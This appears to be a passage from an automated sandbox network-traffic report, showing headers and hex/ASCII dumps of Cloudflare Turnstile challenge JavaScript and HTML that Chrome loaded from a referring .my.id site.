                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                  Referer: https://5102487645.my.id/
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:08:59 UTC471INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 22 Oct 2024 14:08:59 GMT
                                                                                                                  Content-Type: application/javascript; charset=UTF-8
                                                                                                                  Content-Length: 47532
                                                                                                                  Connection: close
                                                                                                                  accept-ranges: bytes
                                                                                                                  last-modified: Fri, 18 Oct 2024 17:38:58 GMT
                                                                                                                  cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                                                  access-control-allow-origin: *
                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d6a1005cc46e7a6-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  2024-10-22 14:08:59 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 6c 2c 68 29 7b 74 72 79 7b 76 61 72 20 70 3d 65 5b 6c 5d 28 68 29 2c 66 3d 70 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 73 29 7b 6e 28 73 29 3b 72 65 74 75 72 6e 7d 70 2e 64 6f 6e 65 3f 72 28 66 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 66 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                                                                  Data Ascii: "use strict";(function(){function Wt(e,r,n,o,c,l,h){try{var p=e[l](h),f=p.value}catch(s){n(s);return}p.done?r(f):Promise.resolve(f).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var l=e.apply(r,n);funct
                                                                                                                  2024-10-22 14:08:59 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 41 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 72 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                                                                  Data Ascii: e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function rt(e,r){return r=r!=nu
                                                                                                                  2024-10-22 14:08:59 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 6e 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 42 74 28 65 29 7c 7c 6a 74 28 65 2c 72 29 7c 7c 7a 74 28 65 2c 72 29 7c 7c 71 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 55 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 44 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6c 5b 30
                                                                                                                  Data Ascii: ray$/.test(n))return nt(e,r)}}function Ae(e,r){return Bt(e)||jt(e,r)||zt(e,r)||qt()}function U(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function De(e,r){var n={label:0,sent:function(){if(l[0
                                                                                                                  2024-10-22 14:08:59 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 58 74 3d 33 30 30 30 32 30 3b 76 61 72 20 55 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 71 3b 28 66 75
                                                                                                                  Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Xt=300020;var Ue=300030;var Ve=300031;var q;(fu
                                                                                                                  2024-10-22 14:08:59 UTC1369INData Raw: 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 24 7c 7c 28 24 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20
                                                                                                                  Data Ascii: .NEVER="never",e.MANUAL="manual",e.AUTO="auto"})($||($={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var
                                                                                                                  2024-10-22 14:08:59 UTC1369INData Raw: 65 22 2c 22 66 61 6c 73 65 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 72 6e 20 4c 28 5b 22 72 65 6e 64 65 72 22 2c 22 65 78 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 51 74 3d 33 30 30 2c 24 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 68 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72
                                                                                                                  Data Ascii: e","false"],e)}function gt(e){return L(["render","execute"],e)}var Qt=300,$t=10;function ht(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOver
                                                                                                                  2024-10-22 14:08:59 UTC1369INData Raw: 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 73 29 7d 76 61 72 20 54 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 2c 6e 2c 6f 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 6c 2c 68 3d 4c 28 4e 72 2c 28 6c 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 6c 21 3d 3d 76 6f 69 64 20 30 3f 6c 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 70 2c
                                                                                                                  Data Ascii: age,"/").concat(s)}var Tt=function(e){var r,n,o=window.innerWidth<400,c=e.state===Se.FAILURE_FEEDBACK||e.state===Se.FAILURE_HAVING_TROUBLES,l,h=L(Nr,(l=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&l!==void 0?l:"nonexistent"),p,
                                                                                                                  2024-10-22 14:08:59 UTC1369INData Raw: 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 42 6f 6f 6c 65 61 6e 2c 5b 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 42 65 28 29 3f 49 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 6c 2c 68 29 7b 76 61 72 20 70 3d 5b 6e 75 6c 6c 5d 3b 70 2e 70 75 73 68 2e 61 70 70 6c 79 28 70 2c 6c 29 3b 76 61 72 20 66 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 70 29 2c 73 3d 6e 65 77 20 66 3b 72 65 74 75 72 6e 20 68 26 26 4a 28 73 2c 68 2e 70 72 6f 74 6f 74 79 70 65 29 2c 73 7d 2c 49 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74
                                                                                                                  Data Ascii: ect.construct(Boolean,[],function(){})),!0}catch(e){return!1}}function Ie(e,r,n){return Be()?Ie=Reflect.construct:Ie=function(c,l,h){var p=[null];p.push.apply(p,l);var f=Function.bind.apply(c,p),s=new f;return h&&J(s,h.prototype),s},Ie.apply(null,argument
                                                                                                                  2024-10-22 14:08:59 UTC1369INData Raw: 74 69 6f 6e 20 67 28 65 2c 72 29 7b 76 61 72 20 6e 3d 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2e 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 73 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 71 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 57 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 57 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 4b 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 57 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63
                                                                                                                  Data Ascii: tion g(e,r){var n="[Cloudflare Turnstile] ".concat(e,".");throw new sr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function qe(e){return e.startsWith(We)?e.substring(We.length):null}function K(e){return"".concat(We).concat(e)}func
                                                                                                                  2024-10-22 14:08:59 UTC1369INData Raw: 6f 70 3d 22 30 22 2c 70 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 22 2c 70 2e 73 74 79 6c 65 2e 74 72 61 6e 73 66 6f 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 70 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 70 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 70 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 66 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 66 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 66 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 66 2e 73 74 79 6c
                                                                                                                  Data Ascii: op="0",p.style.left="0",p.style.transformOrigin="center center",p.style.overflowX="hidden",p.style.overflowY="auto",p.style.background="rgba(0,0,0,0.4)";var f=document.createElement("div");f.style.display="table-cell",f.style.verticalAlign="middle",f.styl


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  57192.168.2.1649800104.18.95.414432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:09:00 UTC799OUTGET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/nu8l3/0x4AAAAAAAgk0nqtAQ4g0A4d/auto/fbE/normal/auto/ HTTP/1.1
                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                  Sec-Fetch-Dest: iframe
                                                                                                                  Referer: https://5102487645.my.id/
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:09:01 UTC1368INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 22 Oct 2024 14:09:00 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Content-Length: 26687
                                                                                                                  Connection: close
                                                                                                                  cross-origin-opener-policy: same-origin
                                                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                  content-security-policy: frame-src https://challenges.cloudflare.com/ blob:; base-uri 'self'
                                                                                                                  accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                  document-policy: js-profiling
                                                                                                                  critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                  permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                  cross-origin-embedder-policy: require-corp
                                                                                                                  origin-agent-cluster: ?1
                                                                                                                  referrer-policy: same-origin
                                                                                                                  2024-10-22 14:09:01 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 64 36 61 31 30 30 63 65 63 61 37 65 37 64 62 2d 44 46 57 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: Server: cloudflareCF-RAY: 8d6a100ceca7e7db-DFWalt-svc: h3=":443"; ma=86400
                                                                                                                  2024-10-22 14:09:01 UTC1288INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                                                                  Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                                                                  2024-10-22 14:09:01 UTC1369INData Raw: 64 65 6e 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69
                                                                                                                  Data Ascii: den;padding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:anti
                                                                                                                  2024-10-22 14:09:01 UTC1369INData Raw: 20 6c 69 6e 65 7b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b
                                                                                                                  Data Ascii: line{stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;
                                                                                                                  2024-10-22 14:09:01 UTC1369INData Raw: 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c
                                                                                                                  Data Ascii: #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dark #chal
                                                                                                                  2024-10-22 14:09:01 UTC1369INData Raw: 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c
                                                                                                                  Data Ascii: me-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-helper-l
                                                                                                                  2024-10-22 14:09:01 UTC1369INData Raw: 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 75 6f 34 73 36 66 64 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 7d 74 6f 7b 66 69
                                                                                                                  Data Ascii: -dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.uo4s6fd{0%{fill:#de1303;stroke:#de1303}to{fi
